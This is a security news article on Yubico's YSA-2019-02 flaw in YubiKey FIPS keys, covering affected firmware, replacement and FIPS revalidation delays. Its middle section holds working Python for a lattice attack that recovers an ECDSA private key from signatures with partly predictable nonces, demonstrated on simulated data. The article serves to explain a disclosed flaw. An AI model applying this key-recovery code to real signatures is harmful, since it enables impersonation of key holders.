Security token maker Yubico has issued an important advisory affecting high-end versions of its YubiKey authentication key, arguably the most significant vulnerability discovered in this class of product to date.

Yubico describes the bug in its FIPS series (security advisory YSA-2019-02) as being:

Where the first set of random values used by YubiKey FIPS applications after each device power-up have reduced randomness … for the first operations performed after YubiKey FIPS power-up. The buffer holding random values contains some predictable content left over from the FIPS power-up self-tests which could affect cryptographic operations which require random data until the predictable content is exhausted.

In other words, the random values the key draws for its first operation (or operations) after power-up are partly predictable. The weakness is short-lived: it lasts only until the stale self-test data in the buffer has been consumed, after which the output is fully random again, but anything generated or signed before that point used weaker randomness than it should have.

This affects cryptographic algorithms to different extents. For RSA it is a modest 80 predictable bits out of a key of at least 2,048, while for ECDSA it is 80 bits out of the 256-bit random nonce that every signature depends on, which Yubico says could:

Allow an attacker who gains access to several signatures to reconstruct the private key.

These differences mean that the weakness is worse in some products than in others. The more serious case is the FIPS FIDO U2F keys, whose authentication consists of ECDSA signatures that are handed to the relying party on every login; the PIV Smart Card and OpenPGP applications are less exposed when they are used with RSA keys.
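Why 80 predictable bits of a 256-bit nonce is enough to lose the key is worth seeing rather than taking on trust. The following is an added example written for this article, not Yubico's code and not the analysis behind the advisory. It implements textbook ECDSA over P-256 (the real, public curve constants) and then a hidden-number-problem lattice attack with a small LLL written in Decimal arithmetic. Everything about the weak nonces is a modelling assumption: the demo assumes the predictable 80 bits are the top bits of the nonce and that they are the same stale value after every power-up (STALE_TOP is a made-up constant; the real leftover buffer content is not public), and it simulates six "first signature after plug-in" operations with a seeded generator. None of this interacts with a YubiKey.

```python
import hashlib
import random
from decimal import Decimal, getcontext

# NIST P-256 domain parameters (public constants; the curve FIDO U2F signs with).
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)
KNOWN_BITS = 80                   # predictable nonce bits (the advisory's figure)
UNKNOWN_BITS = 256 - KNOWN_BITS   # nonce bits that are still genuinely random
E = 1 << UNKNOWN_BITS             # bound on the unknown part of each nonce
# Hypothetical stale 80 bits every first-after-power-up nonce starts with (constructed).
STALE_TOP = 0x0102030405060708090a

def ec_add(p1, p2):
    """Affine point addition on P-256 (a = -3); None is the point at infinity."""
    if p1 is None: return p2
    if p2 is None: return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2:
        if (y1 + y2) % P == 0: return None
        lam = (3 * x1 * x1 - 3) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return x3, (lam * (x1 - x3) - y1) % P

def ec_mul(k, pt):
    """Double-and-add scalar multiplication."""
    acc = None
    while k:
        if k & 1: acc = ec_add(acc, pt)
        pt = ec_add(pt, pt)
        k >>= 1
    return acc

def sign(d, msg, k):
    """Textbook ECDSA with a caller-supplied nonce k (the weak input we model)."""
    h = int.from_bytes(hashlib.sha256(msg).digest(), "big")
    r = ec_mul(k, G)[0] % N
    return h, r, pow(k, -1, N) * (h + r * d) % N

def lll(b, delta=Decimal(3) / 4):
    """Minimal LLL on integer rows; Gram-Schmidt in 600-digit Decimal (ample for 512-bit entries)."""
    getcontext().prec = 600
    n = len(b)
    bs, mu = [None] * n, [[Decimal(0)] * n for _ in range(n)]
    def update(i):                # recompute bs[i] and mu[i][*] from the exact integer rows
        v = [Decimal(x) for x in b[i]]
        for j in range(i):
            mu[i][j] = sum(Decimal(x) * y for x, y in zip(b[i], bs[j])) / sum(y * y for y in bs[j])
            v = [x - mu[i][j] * y for x, y in zip(v, bs[j])]
        bs[i] = v
    for i in range(n): update(i)
    k = 1
    while k < n:
        for j in range(k - 1, -1, -1):           # size-reduce row k against row j
            q = round(mu[k][j])
            if q:
                b[k] = [x - q * y for x, y in zip(b[k], b[j])]
                update(k)
        if sum(x * x for x in bs[k]) >= (delta - mu[k][k - 1] ** 2) * sum(x * x for x in bs[k - 1]):
            k += 1
        else:                                    # Lovasz condition failed: swap, step back
            b[k], b[k - 1] = b[k - 1], b[k]
            for i in range(k - 1, n): update(i)
            k = max(k - 1, 1)
    return b

def recover_key(sigs, pub, known_top):
    """Hidden-number-problem attack: k = s^-1 h + s^-1 r d (mod N) and k = known_top*E + e
    with 0 <= e < E, so (N*(e_i - E/2), ..., d*E, N*E) is an unusually short lattice vector."""
    m = len(sigs)
    rows = [[N * N if c == i else 0 for c in range(m + 2)] for i in range(m)]
    a_row, b_row = [], []
    for h, r, s in sigs:
        s_inv = pow(s, -1, N)
        a_row.append(N * (s_inv * r % N))
        b_row.append(N * ((s_inv * h - known_top * E - E // 2) % N))
    rows.append(a_row + [E, 0])
    rows.append(b_row + [0, N * E])
    for v in lll(rows):
        if abs(v[-1]) == N * E:               # candidate for +/- the target vector
            d = (v[-2] if v[-1] > 0 else -v[-2]) // E % N
            if ec_mul(d, G) == pub: return d  # confirm against the public key
    return None

def weak_signatures(d, count, rng):
    """Model 'first signature after power-up' count times: the nonce's top 80 bits
    are the same stale buffer content each time, only the low bits are fresh."""
    return [sign(d, b"U2F challenge %d" % i, (STALE_TOP << UNKNOWN_BITS) | rng.getrandbits(UNKNOWN_BITS))
            for i in range(count)]

def demo(num_sigs=6, seed=2019):
    """True when the private key is recovered from num_sigs weak signatures (constructed input)."""
    rng = random.Random(seed)                 # deterministic demo input, not a real RNG
    d = rng.randrange(1, N)                   # victim's private key
    return recover_key(weak_signatures(d, num_sigs, rng), ec_mul(d, G), STALE_TOP) == d
```

Calling demo() builds a key, produces six signatures whose nonces share the stale top 80 bits, and returns True when the lattice step hands the private key back; the attacker never needs the unknown 176 bits, only the public (h, r, s) triples and the predictable part. Six signatures leave a comfortable margin for this toy reduction; fewer predictable bits would need more signatures, and a weaker assumption (predictable bits in a different position) changes the bookkeeping in recover_key but not the principle. The practical point for U2F is that every authentication already gives the relying party one such signature.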

FIPS with everything

The weakness exists only in the YubiKey FIPS, YubiKey Nano FIPS, YubiKey C FIPS, and YubiKey C Nano FIPS, that is, the products that have 'FIPS' printed on them. Consumer and most business YubiKeys are not affected.

The Federal Information Processing Standards, or FIPS, are a suite of US government standards; the one that matters here is FIPS 140-2, which covers the validation of cryptographic modules for environments such as the federal government or military that demand approved encryption, hashing and signing algorithms.

Getting even a basic FIPS validation is time-consuming and expensive because an accredited laboratory has to test the module and NIST's Cryptographic Module Validation Program has to sign off on the results, covering all sorts of security characteristics, including physical tamper evidence as well as the robustness of the way the cryptographic algorithms have been implemented.

Device makers jump through these hoops because they have to – no FIPS compliance at the required level and selling to the Feds becomes a non-starter.

It’s worth mentioning all this because the issue of FIPS has had a direct influence on the timing of Yubico’s advisory.

Affected YubiKeys are those running FIPS Series firmware versions 4.4.2 and 4.4.4 (there is no 4.4.3); the fix is FIPS Series firmware 4.4.5. YubiKey firmware cannot be upgraded in the field, so an affected key has to be replaced rather than patched, and Yubico offered replacements for affected devices. Yubico's own tools report the firmware version, so checking a key against the list above is quick.

It seems the weakness was discovered some time ago but the fix only shipped to customers on 30 April 2019, once the revised firmware had completed FIPS validation.

That's the extra complication of FIPS: a changed firmware has to go back through validation before it can be sold as a FIPS product, and that applies to everything, including urgent security fixes.